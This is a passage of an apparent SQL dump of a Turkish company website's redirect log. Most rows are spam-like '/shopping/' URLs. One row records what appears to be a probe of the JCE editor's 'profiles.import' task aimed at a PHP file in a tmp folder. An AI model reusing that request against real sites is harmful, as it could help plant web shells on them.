00:00:00',301),(76531,'https://3s-technologies.com.tr/tr/shopping/gloomed/1687731128.html',NULL,'https://3s-technologies.com.tr/shopping/gloomed/1687731128.html','',1,0,'2026-06-11 09:07:42','0000-00-00 00:00:00',301),(76532,'https://3s-technologies.com.tr/tr/shopping/bladesmith/4202867688.html',NULL,'https://3s-technologies.com.tr/shopping/bladesmith/4202867688.html','',1,0,'2026-06-11 09:07:45','0000-00-00 00:00:00',301),(76533,'https://3s-technologies.com.tr/tr/shopping/mantelli/3658756520.html',NULL,'https://3s-technologies.com.tr/shopping/mantelli/3658756520.html','',1,0,'2026-06-11 09:07:48','0000-00-00 00:00:00',301),(76534,'https://3s-technologies.com.tr/tr/shopping/sternohyoid/638252706.html',NULL,'https://3s-technologies.com.tr/shopping/sternohyoid/638252706.html','',1,0,'2026-06-11 09:07:51','0000-00-00 00:00:00',301),(76535,'https://3s-technologies.com.tr/tr/shopping/sentinelled/933762022.html',NULL,'https://3s-technologies.com.tr/shopping/sentinelled/933762022.html','',1,0,'2026-06-11 09:07:54','0000-00-00 00:00:00',301),(76536,'https://3s-technologies.com.tr/tr/shopping/myoporum/3358869530.html',NULL,'https://3s-technologies.com.tr/shopping/myoporum/3358869530.html','',1,0,'2026-06-11 09:07:57','0000-00-00 00:00:00',301),(76537,'https://3s-technologies.com.tr/tr/shopping/divestible/3824890209.html',NULL,'https://3s-technologies.com.tr/shopping/divestible/3824890209.html','',1,0,'2026-06-11 09:08:00','0000-00-00 00:00:00',301),(76538,'http://3s-technologies.com.tr/en/tmp/829829.ph$p',NULL,'http://3s-technologies.com.tr/index.php?option=com_jce&task=profiles.import','',1,0,'2026-06-11 09:08:01','0000-00-00 00:00:00',301),(76539,'https://3s-technologies.com.tr/tr/shopping/thwittle/1150536877.html',NULL,'https://3s-technologies.com.tr/shopping/thwittle/1150536877.html','',1,0,'2026-06-11 09:08:03','0000-00-00 00:00:00',301),(76540,'https://3s-technologies.com.tr/tr/shopping/sicle/3642450042.html',NULL,'https://3s-technologies.com.tr/shopping/sicle/3642450042.html','',1,0,'2026-06-11 09:08:06','0000-00-00 00:00:00',301),(76541,'https://3s-technologies.com.tr/tr/shopping/poniard/1482527942.html',NULL,'https://3s-technologies.com.tr/shopping/poniard/1482527942.html','',1,0,'2026-06-11 09:08:09','0000-00-00 00:00:00',301),(76542,'https://3s-technologies.com.tr/tr/shopping/dental/3190472895.html',NULL,'https://3s-technologies.com.tr/shopping/dental/3190472895.html','',1,0,'2026-06-11 09:08:14','0000-00-00 00:00:00',301),(76543,'https://3s-technologies.com.tr/tr/shopping/merriest/4112452344.html',NULL,'https://3s-technologies.com.tr/shopping/merriest/4112452344.html','',1,0,'2026-06-11 09:08:16','0000-00-00 00:00:00',301),(76544,'https://3s-technologies.com.tr/tr/shopping/cancrine/3374241813.html',NULL,'https://3s-technologies.com.tr/shopping/cancrine/3374241813.html','',1,0,'2026-06-11 09:08:19','0000-00-00 00:00:00',301),(76545,'https://3s-technologies.com.tr/tr/shopping/cabeiri/2257309228.html',NULL,'https://3s-technologies.com.tr/shopping/cabeiri/2257309228.html','',1,0,'2026-06-11 09:08:22','0000-00-00 00:00:00',301),(76546,'https://3s-technologies.com.tr/tr/shopping/locusta/2710941332.html',NULL,'https://3s-technologies.com.tr/shopping/locusta/2710941332.html','',1,0,'2026-06-11 09:08:25','0000-00-00 00:00:00',301),(76547,'https://3s-technologies.com.tr/tr/shopping/nepotic/2871462264.html',NULL,'https://3s-technologies.com.tr/shopping/nepotic/2871462264.html','',1,0,'2026-06-11 09:08:28','0000-00-00 00:00:00',301),(76548,'https://3s-technologies.com.tr/tr/shopping/officially/2428942884.html',NULL,'https://3s-technologies.com.tr/shopping/officially/2428942884.html','',1,0,'2026-06-11 09:08:31','0000-00-00 00:00:00',301),(76549,'https://3s-technologies.com.tr/tr/shopping/deputed/3641237943.html',NULL,'https://3s-technologies.com.tr/shopping/deputed/3641237943.html','',1,0,'2026-06-11 09:08:34','0000-00-00 00:00:00',301),(76550,'https://3s-technologies.com.tr/tr/shopping/wreakfully/3645826747.html',NULL,'https://3s-technologies.com.tr/shopping/wreakfully/3645826747.html','',1,0,'2026-06-11 09:08:37','0000-00-00 00:00:00',301),(76551,'https://3s-technologies.com.tr/tr/shopping/tentfuls/1044874486.html',NULL,'https://3s-technologies.com.tr/shopping/tentfuls/1044874486.html','',1,0,'2026-06-11 09:08:40','0000-00-00 00:00:00',301),(76552,'https://3s-technologies.com.tr/tr/shopping/piluralis/3720457446.html',NULL,'https://3s-technologies.com.tr/shopping/piluralis/3720457446.html','',1,0,'2026-06-11 09:08:43','0000-00-00 00:00:00',301),(76553,'https://3s-technologies.com.tr/tr/shopping/broadsheet/1269432983.html',NULL,'https://3s-technologies.com.tr/shopping/broadsheet/1269432983.html','',1,0,'2026-06-11 09:08:46','0000-00-00 00:00:00',301),(76554,'https://3s-technologies.com.tr/tr/shopping/categoricalness/1853135486.html',NULL,'https://3s-technologies.com.tr/shopping/categoricalness/1853135486.html','',1,0,'2026-06-11 09:08:49','0000-00-00 00:00:00',301),(76555,'https://3s-technologies.com.tr/tr/shopping/zealless/3377782025.html',NULL,'https://3s-technologies.com.tr/shopping/zealless/3377782025.html','',1,0,'2026-06-11 09:08:52','0000-00-00 00:00:00',301),(76556,'https://3s-technologies.com.tr/tr/shopping/dumbbell/1684485554.html',NULL,'https://3s-technologies.com.tr/shopping/dumbbell/1684485554.html','',1,0,'2026-06-11 09:08:55','0000-00-00 00:00:00',301),(76557,'https://3s-technologies.com.tr/tr/shopping/geissois/4007093160.html',NULL,'https://3s-technologies.com.tr/shopping/geissois/4007093160.html','',1,0,'2026-06-11 09:08:58','0000-00-00 00:00:00',301),(76558,'https://3s-technologies.com.tr/tr/shopping/sandlot/4189280046.html',NULL,'https://3s-technologies.com.tr/shopping/sandlot/4189280046.html','',1,0,'2026-06-11 09:09:01','0000-00-00 00:00:00',301),(76559,'https://3s-technologies.com.tr/tr/shopping/subterrene/784795257.html',NULL,'https://3s-technologies.com.tr/shopping/subterrene/784795257.html','',1,0,'2026-06-11 09:09:04','0000-00-00 00:00:00',301),(76560,'https://3s-technologies.com.tr/tr/shopping/paragnathi/3117563128.html',NULL,'https://3s-technologies.com.tr/shopping/paragnathi/3117563128.html','',1,0,'2026-06-11 09:09:07','0000-00-00 00:00:00',301),(76561,'https://3s-technologies.com.tr/tr/shopping/sepsin/3591269949.html',NULL,'https://3s-technologies.com.tr/shopping/sepsin/3591269949.html','',1,0,'2026-06-11 09:09:10','0000-00-00 00:00:00',301),(76562,'https://3s-technologies.com.tr/tr/shopping/dysphagia/3648414452.html',NULL,'https://3s-technologies.com.tr/shopping/dysphagia/3648414452.html','',1,0,'2026-06-11 09:09:13','0000-00-00 00:00:00',301),(76563,'https://3s-technologies.com.tr/tr/shopping/scolymus/6776965.html',NULL,'https://3s-technologies.com.tr/shopping/scolymus/6776965.html','',1,0,'2026-06-11 09:09:16','0000-00-00 00:00:00',301),(76564,'https://3s-technologies.com.tr/tr/shopping/friended/3136130281.html',NULL,'https://3s-technologies.com.tr/shopping/friended/3136130281.html','',1,0,'2026-06-11 09:09:19','0000-00-00 00:00:00',301),(76565,'https://3s-technologies.com.tr/tr/shopping/sparrowwort/3021822947.html',NULL,'https://3s-technologies.com.tr/shopping/sparrowwort/3021822947.html','',1,0,'2026-06-11 09:09:22','0000-00-00 00:00:00',301),(76566,'https://3s-technologies.com.tr/tr/shopping/wivern/1780832868.html',NULL,'https://3s-technologies.com.tr/shopping/wivern/1780832868.html','',1,0,'2026-06-11 09:09:25','0000-00-00 00:00:00',301),(76567,'https://3s-technologies.com.tr/tr/shopping/reliableness/2976821448.html',NULL,'https://3s-technologies.com.tr/shopping/reliableness/2976821448.html','',1,0,'2026-06-11 09:09:28','0000-00-00 00:00:00',301),(76568,'https://3s-technologies.com.tr/tr/shopping/anhelation/1342902276.html',NULL,'https://3s-technologies.com.tr/shopping/anhelation/1342902276.html','',1,0,'2026-06-11 09:09:31','0000-00-00 00:00:00',301),(76569,'https://3s-technologies.com.tr/tr/shopping/saloop/3867467494.html',NULL,'https://3s-technologies.com.tr/shopping/saloop/3867467494.html','',1,0,'2026-06-11 09:09:39','0000-00-00 00:00:00',301),(76570,'https://3s-technologies.com.tr/tr/shopping/synergy/4254406139.html',NULL,'https://3s-technologies.com.tr/shopping/synergy/4254406139.html','',1,0,'2026-06-11 09:09:41','0000-00-00 00:00:00',301),(76571,'https://3s-technologies.com.tr/tr/shopping/cabineting/1758725519.html',NULL,'https://3s-technologies.com.tr/shopping/cabineting/1758725519.html','',1,0,'2026-06-11 09:09:44','0000-00-00 00:00:00',301),(76572,'https://3s-technologies.com.tr/tr/shopping/agrise/3736860009.html',NULL,'https://3s-technologies.com.tr/shopping/agrise/3736860009.html','',1,0,'2026-06-11 09:09:47','0000-00-00 00:00:00',301),(76573,'https://3s-technologies.com.tr/tr/shopping/zoochlorella/2166699065.html',NULL,'https://3s-technologies.com.tr/shopping/zoochlorella/2166699065.html','',1,0,'2026-06-11 09:09:50','0000-00-00 00:00:00',301),(76574,'https://3s-technologies.com.tr/tr/shopping/conclusible/1168496881.html',NULL,'https://3s-technologies.com.tr/shopping/conclusible/1168496881.html','',1,0,'2026-06-11 09:09:53','0000-00-00 00:00:00',301),(76575,'https://3s-technologies.com.tr/tr/shopping/reined/3866515019.html',NULL,'https://3s-technologies.com.tr/shopping/reined/3866515019.html','',1,0,'2026-06-11 09:09:56','0000-00-00 00:00:00',301),(76576,'https://3s-technologies.com.tr/tr/shopping/creasol/1999678037.html',NULL,'https://3s-technologies.com.tr/shopping/creasol/1999678037.html','',1,0,'2026-06-11 09:09:59','0000-00-00 00:00:00',301),(76577,'https://3s-technologies.com.tr/tr/shopping/papilionaceae/2509210963.html',NULL,'https://3s-technologies.com.tr/shopping/papilionaceae/2509210963.html','',1,0,'2026-06-11 09:10:02','0000-00-00 00:00:00',301),(76578,'https://3s-technologies.com.tr/tr/shopping/kakoxene/3066383035.html',NULL,'https://3s-technologies.com.tr/shopping/kakoxene/3066383035.html','',1,0,'2026-06-11 09:10:05','0000-00-00 00:00:00',301),(76579,'https://3s-technologies.com.tr/tr/shopping/anaglyptograph/3329026130.html',NULL,'https://3s-technologies.com.tr/shopping/anaglyptograph/3329026130.html','',1,0,'2026-06-11 09:10:08','0000-00-00 00:00:00',301),(76580,'https://3s-technologies.com.tr/tr/shopping/ptyalism/4261419109.html',NULL,'https://3s-technologies.com.tr/shopping/ptyalism/4261419109.html','',1,0,'2026-06-11 09:10:13','0000-00-00 00:00:00',301),(76581,'https://3s-technologies.com.tr/tr/shopping/lupuline/1457436837.html',NULL,'https://3s-technologies.com.tr/shopping/lupuline/1457436837.html','',1,0,'2026-06-11 09:10:17','0000-00-00 00:00:00',301),(76582,'https://3s-technologies.com.tr/tr/shopping/ingurgitation/4017646358.html',NULL,'https://3s-technologies.com.tr/shopping/ingurgitation/4017646358.html','',1,0,'2026-06-11 09:10:20','0000-00-00 00:00:00',301),(76583,'https://3s-technologies.com.tr/tr/shopping/skittles/664341710.html',NULL,'https://3s-technologies.com.tr/shopping/skittles/664341710.html','',1,0,'2026-06-11 09:10:23','0000-00-00 00:00:00',301),(76584,'https://3s-technologies.com.tr/tr/shopping/persifleur/366200291.html',NULL,'https://3s-technologies.com.tr/shopping/persifleur/366200291.html','',1,0,'2026-06-11 09:10:26','0000-00-00 00:00:00',301),(76585,'https://3s-technologies.com.tr/tr/shopping/spectroheliograph/270232883.html',NULL,'https://3s-technologies.com.tr/shopping/spectroheliograph/270232883.html','',1,0,'2026-06-11 09:10:29','0000-00-00 00:00:00',301),(76586,'https://3s-technologies.com.tr/tr/shopping/uniflorous/2424354112.html',NULL,'https://3s-technologies.com.tr/shopping/uniflorous/2424354112.html','',1,0,'2026-06-11 09:10:32','0000-00-00 00:00:00',301),(76587,'https://3s-technologies.com.tr/tr/shopping/shuttleworthii/3433336738.html',NULL,'https://3s-technologies.com.tr/shopping/shuttleworthii/3433336738.html','',1,0,'2026-06-11 09:10:35','0000-00-00 00:00:00',301),(76588,'https://3s-technologies.com.tr/tr/shopping/dextrotartaric/2748584503.html',NULL,'https://3s-technologies.com.tr/shopping/dextrotartaric/2748584503.html','',1,0,'2026-06-11 09:10:38','0000-00-00 00:00:00',301),(76589,'https://3s-technologies.com.tr/tr/shopping/musjid/1454060148.html',NULL,'https://3s-technologies.com.tr/shopping/musjid/1454060148.html','',1,0,'2026-06-11 09:10:41','0000-00-00 00:00:00',301),(76590,'https://3s-technologies.com.tr/tr/shopping/panslavist/589874502.html',NULL,'https://3s-technologies.com.tr/shopping/panslavist/589874502.html','',1,0,'2026-06-11 09:10:44','0000-00-00 00:00:00',301),(76591,'https://3s-technologies.com.tr/tr/shopping/tradeful/2790045806.html',NULL,'https://3s-technologies.com.tr/shopping/tradeful/2790045806.html','',1,0,'2026-06-11 09:10:47','0000-00-00 00:00:00',301),(76592,'https://3s-technologies.com.tr/tr/shopping/decayedness/3423995623.html',NULL,'https://3s-technologies.com.tr/shopping/decayedness/3423995623.html','',1,0,'2026-06-11 09:10:50','0000-00-00 00:00:00',301),(76593,'https://3s-technologies.com.tr/tr/shopping/filthiness/3892558599.html',NULL,'https://3s-technologies.com.tr/shopping/filthiness/3892558599.html','',1,0,'2026-06-11 09:10:53','0000-00-00 00:00:00',301),(76594,'https://3s-technologies.com.tr/tr/shopping/atypic/2777279524.html',NULL,'https://3s-technologies.com.tr/shopping/atypic/2777279524.html','',1,0,'2026-06-11 09:10:56','0000-00-00 00:00:00',301),(76595,'https://3s-technologies.com.tr/tr/shopping/rattlings/102139439.html',NULL,'https://3s-technologies.com.tr/shopping/rattlings/102139439.html','',1,0,'2026-06-11 09:10:59','0000-00-00 00:00:00',301),(76596,'https://3s-technologies.com.tr/tr/shopping/trichechus/1438869684.html',NULL,'https://3s-technologies.com.tr/shopping/trichechus/1438869684.html','',1,0,'2026-06-11 09:11:04','0000-00-00 00:00:00',301),(76597,'https://3s-technologies.com.tr/tr/shopping/sadiron/3398382685.html',NULL,'https://3s-technologies.com.tr/shopping/sadiron/3398382685.html','',1,0,'2026-06-11 09:11:07','0000-00-00 00:00:00',301),(76598,'https://3s-technologies.com.tr/tr/shopping/namtar/3519572281.html',NULL,'https://3s-technologies.com.tr/shopping/namtar/3519572281.html','',1,0,'2026-06-11 09:11:09','0000-00-00 00:00:00',301),(76599,'https://3s-technologies.com.tr/tr/shopping/juniorprenominal/2520928669.html',NULL,'https://3s-technologies.com.tr/shopping/juniorprenominal/2520928669.html','',1,0,'2026-06-11 09:11:13','0000-00-00 00:00:00',301),(76600,'https://3s-technologies.com.tr/tr/shopping/sefilata/2213683335.html',NULL,'https://3s-technologies.com.tr/shopping/sefilata/2213683335.html','',1,0,'2026-06-11 09:11:17','0000-00-00 00:00:00',301),(76601,'https://3s-technologies.com.tr/tr/shopping/interfulgent/3616015755.html',NULL,'https://3s-technologies.com.tr/shopping/interfulgent/3616015755.html','',1,0,'2026-06-11 09:11:19','0000-00-00 00:00:00',301),(76602,'https://3s-technologies.com.tr/tr/shopping/cephalotus/1658872584.html',NULL,'https://3s-technologies.com.tr/shopping/cephalotus/1658872584.html','',1,0,'2026-06-11 09:11:21','0000-00-00 00:00:00',301),(76603,'https://3s-technologies.com.tr/tr/shopping/gallivant/3956127251.html',NULL,'https://3s-technologies.com.tr/shopping/gallivant/3956127251.html','',1,0,'2026-06-11 09:11:25','0000-00-00 00:00:00',301),(76604,'https://3s-technologies.com.tr/tr/shopping/woodchat/2239954174.html',NULL,'https://3s-technologies.com.tr/shopping/woodchat/2239954174.html','',1,0,'2026-06-11 09:11:28','0000-00-00 00:00:00',301),(76605,'https://3s-technologies.com.tr/tr/shopping/achromatinic/4232905907.html',NULL,'https://3s-technologies.com.tr/shopping/achromatinic/4232905907.html','',1,0,'2026-06-11 09:11:31','0000-00-00 00:00:00',301),(76606,'https://3s-technologies.com.tr/tr/shopping/tetradactyl/1733634414.html',NULL,'https://3s-technologies.com.tr/shopping/tetradactyl/1733634414.html','',1,0,'2026-06-11 09:11:34','0000-00-00 00:00:00',301),(76607,'https://3s-technologies.com.tr/tr/shopping/maturely/1536298030.html',NULL,'https://3s-technologies.com.tr/shopping/maturely/1536298030.html','',1,0,'2026-06-11 09:11:37','0000-00-00 00:00:00',301),(76608,'https://3s-technologies.com.tr/tr/shopping/ricinelaidic/3045356670.html',NULL,'https://3s-technologies.com.tr/shopping/ricinelaidic/3045356670.html','',1,0,'2026-06-11 09:11:40','0000-00-00 00:00:00',301),(76609,'https://3s-technologies.com.tr/tr/shopping/idolist/1961871359.html',NULL,'https://3s-technologies.com.tr/shopping/idolist/1961871359.html','',1,0,'2026-06-11 09:11:43','0000-00-00 00:00:00',301),(76610,'https://3s-technologies.com.tr/tr/shopping/corrodiate/2102613039.html',NULL,'https://3s-technologies.com.tr/shopping/corrodiate/2102613039.html','',1,0,'2026-06-11 09:11:48','0000-00-00 00:00:00',301),(76611,'https://3s-technologies.com.tr/tr/shopping/rescribe/1188016525.html',NULL,'https://3s-technologies.com.tr/shopping/rescribe/1188016525.html','',1,0,'2026-06-11 09:11:50','0000-00-00 00:00:00',301),(76612,'https://3s-technologies.com.tr/tr/shopping/nourice/1734846513.html',NULL,'https://3s-technologies.com.tr/shopping/nourice/1734846513.html','',1,0,'2026-06-11 09:11:53','0000-00-00 00:00:00',301),(76613,'https://3s-technologies.com.tr/tr/shopping/laurinol/2032734635.html',NULL,'https://3s-technologies.com.tr/shopping/laurinol/2032734635.html','',1,0,'2026-06-11 09:11:56','0000-00-00 00:00:00',301),(76614,'https://3s-technologies.com.tr/tr/shopping/besteaded/4207587575.html',NULL,'https://3s-technologies.com.tr/shopping/besteaded/4207587575.html','',1,0,'2026-06-11 09:11:59','0000-00-00 00:00:00',301),(76615,'https://3s-technologies.com.tr/tr/shopping/nailless/2255144638.html',NULL,'https://3s-technologies.com.tr/shopping/nailless/2255144638.html','',1,0,'2026-06-11 09:12:02','0000-00-00 00:00:00',301),(76616,'https://3s-technologies.com.tr/tr/shopping/suspensoria/3284024615.html',NULL,'https://3s-technologies.com.tr/shopping/suspensoria/3284024615.html','',1,0,'2026-06-11 09:12:08','0000-00-00 00:00:00',301),(76617,'https://3s-technologies.com.tr/tr/shopping/ingratiatory/3742564827.html',NULL,'https://3s-technologies.com.tr/shopping/ingratiatory/3742564827.html','',1,0,'2026-06-11 09:12:12','0000-00-00 00:00:00',301),(76618,'https://3s-technologies.com.tr/tr/shopping/gymnotus/4161978943.html',NULL,'https://3s-technologies.com.tr/shopping/gymnotus/4161978943.html','',1,0,'2026-06-11 09:12:15','0000-00-00 00:00:00',301),(76619,'https://3s-technologies.com.tr/tr/shopping/leiocome/2778491623.html',NULL,'https://3s-technologies.com.tr/shopping/leiocome/2778491623.html','',1,0,'2026-06-11 09:12:18','0000-00-00 00:00:00',301),(76620,'https://3s-technologies.com.tr/tr/shopping/orology/3921071801.html',NULL,'https://3s-technologies.com.tr/shopping/orology/3921071801.html','',1,0,'2026-06-11 09:12:21','0000-00-00 00:00:00',301),(76621,'https://3s-technologies.com.tr/tr/shopping/neurosis/3234616147.html',NULL,'https://3s-technologies.com.tr/shopping/neurosis/3234616147.html','',1,0,'2026-06-11 09:12:24','0000-00-00 00:00:00',301),(76622,'https://3s-technologies.com.tr/tr/shopping/pawnbroker/514562106.html',NULL,'https://3s-technologies.com.tr/shopping/pawnbroker/514562106.html','',1,0,'2026-06-11 09:12:32','0000-00-00 00:00:00',301),(76623,'https://3s-technologies.com.tr/tr/shopping/rachiotome/3381158714.html',NULL,'https://3s-technologies.com.tr/shopping/rachiotome/3381158714.html','',1,0,'2026-06-11 09:12:34','0000-00-00 00:00:00',301),(76624,'https://3s-technologies.com.tr/tr/shopping/arenas/200140279.html',NULL,'https://3s-technologies.com.tr/shopping/arenas/200140279.html','',1,0,'2026-06-11 09:12:37','0000-00-00 00:00:00',301),(76625,'https://3s-technologies.com.tr/tr/shopping/arachnological/157908336.html',NULL,'https://3s-technologies.com.tr/shopping/arachnological/157908336.html','',1,0,'2026-06-11 09:12:40','0000-00-00 00:00:00',301),(76626,'https://3s-technologies.com.tr/tr/shopping/jerrybuilder/3863927298.html',NULL,'https://3s-technologies.com.tr/shopping/jerrybuilder/3863927298.html','',1,0,'2026-06-11 09:12:43','0000-00-00 00:00:00',301),(76627,'https://3s-technologies.com.tr/tr/shopping/october/809886362.html',NULL,'https://3s-technologies.com.tr/shopping/october/809886362.html','',1,0,'2026-06-11 09:12:46','0000-00-00 00:00:00',301),(76628,'https://3s-technologies.com.tr/tr/shopping/oligochaete/1996137841.html',NULL,'https://3s-technologies.com.tr/shopping/oligochaete/1996137841.html','',1,0,'2026-06-11 09:12:52','0000-00-00 00:00:00',301),(76629,'https://3s-technologies.com.tr/tr/shopping/laniary/1640436546.html',NULL,'https://3s-technologies.com.tr/shopping/laniary/1640436546.html','',1,0,'2026-06-11 09:12:54','0000-00-00 00:00:00',301),(76630,'https://3s-technologies.com.tr/tr/shopping/taysachs/4136887838.html',NULL,'https://3s-technologies.com.tr/shopping/taysachs/4136887838.html','',1,0,'2026-06-11 09:12:57','0000-00-00 00:00:00',301),(76631,'https://3s-technologies.com.tr/tr/shopping/leucoium/1409403991.html',NULL,'https://3s-technologies.com.tr/shopping/leucoium/1409403991.html','',1,0,'2026-06-11 09:13:00','0000-00-00 00:00:00',301),(76632,'https://3s-technologies.com.tr/tr/shopping/septicaemia/592039092.html',NULL,'https://3s-technologies.com.tr/shopping/septicaemia/592039092.html','',1,0,'2026-06-11 09:13:03','0000-00-00 00:00:00',301),(76633,'https://3s-technologies.com.tr/tr/shopping/bellyacher/585122207.html',NULL,'https://3s-technologies.com.tr/shopping/bellyacher/585122207.html','',1,0,'2026-06-11 09:13:06','0000-00-00 00:00:00',301),(76634,'https://3s-technologies.com.tr/tr/shopping/mascagnin/2384939284.html',NULL,'https://3s-technologies.com.tr/shopping/mascagnin/2384939284.html','',1,0,'2026-06-11 09:13:14','0000-00-00 00:00:00',301),(76635,'https://3s-technologies.com.tr/tr/shopping/unconceivableness/3689434312.html',NULL,'https://3s-technologies.com.tr/shopping/unconceivableness/3689434312.html','',1,0,'2026-06-11 09:13:17','0000-00-00 00:00:00',301),(76636,'https://3s-technologies.com.tr/tr/shopping/muscarin/26901559.html',NULL,'https://3s-technologies.com.tr/shopping/muscarin/26901559.html','',1,0,'2026-06-11 09:13:20','0000-00-00 00:00:00',301),(76637,'https://3s-technologies.com.tr/tr/shopping/spesiosa/193127309.html',NULL,'https://3s-technologies.com.tr/shopping/spesiosa/193127309.html','',1,0,'2026-06-11 09:13:23','0000-00-00 00:00:00',301),(76638,'https://3s-technologies.com.tr/tr/shopping/quandary/2184054119.html',NULL,'https://3s-technologies.com.tr/shopping/quandary/2184054119.html','',1,0,'2026-06-11 09:13:26','0000-00-00 00:00:00',301),(76639,'https://3s-technologies.com.tr/tr/shopping/victualage/345912190.html',NULL,'https://3s-technologies.com.tr/shopping/victualage/345912190.html','',1,0,'2026-06-11 09:13:29','0000-00-00 00:00:00',301),(76640,'https://3s-technologies.com.tr/tr/shopping/ginkgophyta/691856997.html',NULL,'https://3s-technologies.com.tr/shopping/ginkgophyta/691856997.html','',1,0,'2026-06-11 09:13:37','0000-00-00 00:00:00',301),(76641,'https://3s-technologies.com.tr/tr/shopping/thorniest/4204210886.html',NULL,'https://3s-technologies.com.tr/shopping/thorniest/4204210886.html','',1,0,'2026-06-11 09:13:39','0000-00-00 00:00:00',301),(76642,'https://3s-technologies.com.tr/tr/shopping/sauropoda/961017717.html',NULL,'https://3s-technologies.com.tr/shopping/sauropoda/961017717.html','',1,0,'2026-06-11 09:13:42','0000-00-00 00:00:00',301),(76643,'https://3s-technologies.com.tr/tr/shopping/unmovably/3343349837.html',NULL,'https://3s-technologies.com.tr/shopping/unmovably/3343349837.html','',1,0,'2026-06-11 09:13:45','0000-00-00 00:00:00',301),(76644,'https://3s-technologies.com.tr/tr/shopping/gloppen/3527355939.html',NULL,'https://3s-technologies.com.tr/shopping/gloppen/3527355939.html','',1,0,'2026-06-11 09:13:48','0000-00-00 00:00:00',301),(76645,'https://3s-technologies.com.tr/tr/shopping/heliacally/390472246.html',NULL,'https://3s-technologies.com.tr/shopping/heliacally/390472246.html','',1,0,'2026-06-11 09:13:51','0000-00-00 00:00:00',301),(76646,'https://3s-technologies.com.tr/tr/shopping/mineralized/3325649441.html',NULL,'https://3s-technologies.com.tr/shopping/mineralized/3325649441.html','',1,0,'2026-06-11 09:14:05','0000-00-00 00:00:00',301),(76647,'https://3s-technologies.com.tr/tr/shopping/seamark/1556995150.html',NULL,'https://3s-technologies.com.tr/shopping/seamark/1556995150.html','',1,0,'2026-06-11 09:14:08','0000-00-00 00:00:00',301),(76648,'https://3s-technologies.com.tr/tr/shopping/cameralistics/3349314231.html',NULL,'https://3s-technologies.com.tr/shopping/cameralistics/3349314231.html','',1,0,'2026-06-11 09:14:11','0000-00-00 00:00:00',301),(76649,'https://3s-technologies.com.tr/tr/shopping/humiri/3506460689.html',NULL,'https://3s-technologies.com.tr/shopping/humiri/3506460689.html','',1,0,'2026-06-11 09:14:14','0000-00-00 00:00:00',301),(76650,'https://3s-technologies.com.tr/tr/shopping/hemiholohedral/1174297752.html',NULL,'https://3s-technologies.com.tr/shopping/hemiholohedral/1174297752.html','',1,0,'2026-06-11 09:14:17','0000-00-00 00:00:00',301),(76651,'https://3s-technologies.com.tr/tr/shopping/overgross/1958494670.html',NULL,'https://3s-technologies.com.tr/shopping/overgross/1958494670.html','',1,0,'2026-06-11 09:14:20','0000-00-00 00:00:00',301),(76652,'https://3s-technologies.com.tr/tr/shopping/idiophanous/1580478121.html',NULL,'https://3s-technologies.com.tr/shopping/idiophanous/1580478121.html','',1,0,'2026-06-11 09:14:41','0000-00-00 00:00:00',301),(76653,'https://3s-technologies.com.tr/tr/shopping/turnhalle/2203130137.html',NULL,'https://3s-technologies.com.tr/shopping/turnhalle/2203130137.html','',1,0,'2026-06-11 09:14:43','0000-00-00 00:00:00',301),(76654,'https://3s-technologies.com.tr/tr/shopping/hygienist/1035744517.html',NULL,'https://3s-technologies.com.tr/shopping/hygienist/1035744517.html','',1,0,'2026-06-11 09:14:46','0000-00-00 00:00:00',301),(76655,'https://3s-technologies.com.tr/tr/shopping/kakistocracy/583910108.html',NULL,'https://3s-technologies.com.tr/shopping/kakistocracy/583910108.html','',1,0,'2026-06-11 09:14:49','0000-00-00 00:00:00',301),(76656,'https://3s-technologies.com.tr/tr/shopping/orthographist/1223660828.html',NULL,'https://3s-technologies.com.tr/shopping/orthographist/1223660828.html','',1,0,'2026-06-11 09:14:52','0000-00-00 00:00:00',301),(76657,'https://3s-technologies.com.tr/tr/shopping/abracadabra/732876857.html',NULL,'https://3s-technologies.com.tr/shopping/abracadabra/732876857.html','',1,0,'2026-06-11 09:14:55','0000-00-00 00:00:00',301),(76658,'https://3s-technologies.com.tr/tr/shopping/gibbous/1311057809.html',NULL,'https://3s-technologies.com.tr/shopping/gibbous/1311057809.html','',1,0,'2026-06-11 09:15:14','0000-00-00 00:00:00',301),(76659,'https://3s-technologies.com.tr/tr/shopping/cetology/2280021527.html',NULL,'https://3s-technologies.com.tr/shopping/cetology/2280021527.html','',1,0,'2026-06-11 09:15:17','0000-00-00 00:00:00',301),(76660,'https://3s-technologies.com.tr/tr/shopping/huisher/4184527719.html',NULL,'https://3s-technologies.com.tr/shopping/huisher/4184527719.html','',1,0,'2026-06-11 09:15:20','0000-00-00 00:00:00',301),(76661,'https://3s-technologies.com.tr/tr/shopping/bayoneted/2546854134.html',NULL,'https://3s-technologies.com.tr/shopping/bayoneted/2546854134.html','',1,0,'2026-06-11 09:15:23','0000-00-00 00:00:00',301),(76662,'https://3s-technologies.com.tr/tr/shopping/surbet/1261303999.html',NULL,'https://3s-technologies.com.tr/shopping/surbet/1261303999.html','',1,0,'2026-06-11 09:15:26','0000-00-00 00:00:00',301),(76663,'https://3s-technologies.com.tr/tr/shopping/overpeople/1689074326.html',NULL,'https://3s-technologies.com.tr/shopping/overpeople/1689074326.html','',1,0,'2026-06-11 09:15:29','0000-00-00 00:00:00',301),(76664,'https://3s-technologies.com.tr/tr/shopping/overhent/2455639053.html',NULL,'https://3s-technologies.com.tr/shopping/overhent/2455639053.html','',1,0,'2026-06-11 09:15:40','0000-00-00 00:00:00',301),(76665,'https://3s-technologies.com.tr/tr/shopping/saxicava/3791788219.html',NULL,'https://3s-technologies.com.tr/shopping/saxicava/3791788219.html','',1,0,'2026-06-11 09:15:43','0000-00-00 00:00:00',301),(76666,'https://3s-technologies.com.tr/tr/shopping/sirenian/3597234343.html',NULL,'https://3s-technologies.com.tr/shopping/sirenian/3597234343.html','',1,0,'2026-06-11 09:15:45','0000-00-00 00:00:00',301),(76667,'https://3s-technologies.com.tr/tr/shopping/castellany/1263468589.html',NULL,'https://3s-technologies.com.tr/shopping/castellany/1263468589.html','',1,0,'2026-06-11 09:15:48','0000-00-00 00:00:00',301),(76668,'https://3s-technologies.com.tr/tr/shopping/uranocher/2378367741.html',NULL,'https://3s-technologies.com.tr/shopping/uranocher/2378367741.html','',1,0,'2026-06-11 09:15:51','0000-00-00 00:00:00',301),(76669,'https://3s-technologies.com.tr/tr/shopping/gentianopsis/2796010200.html',NULL,'https://3s-technologies.com.tr/shopping/gentianopsis/2796010200.html','',1,0,'2026-06-11 09:15:58','0000-00-00 00:00:00',301),(76670,'https://3s-technologies.com.tr/tr/shopping/lixivial/3992162320.html',NULL,'https://3s-technologies.com.tr/shopping/lixivial/3992162320.html','',1,0,'2026-06-11 09:16:00','0000-00-00 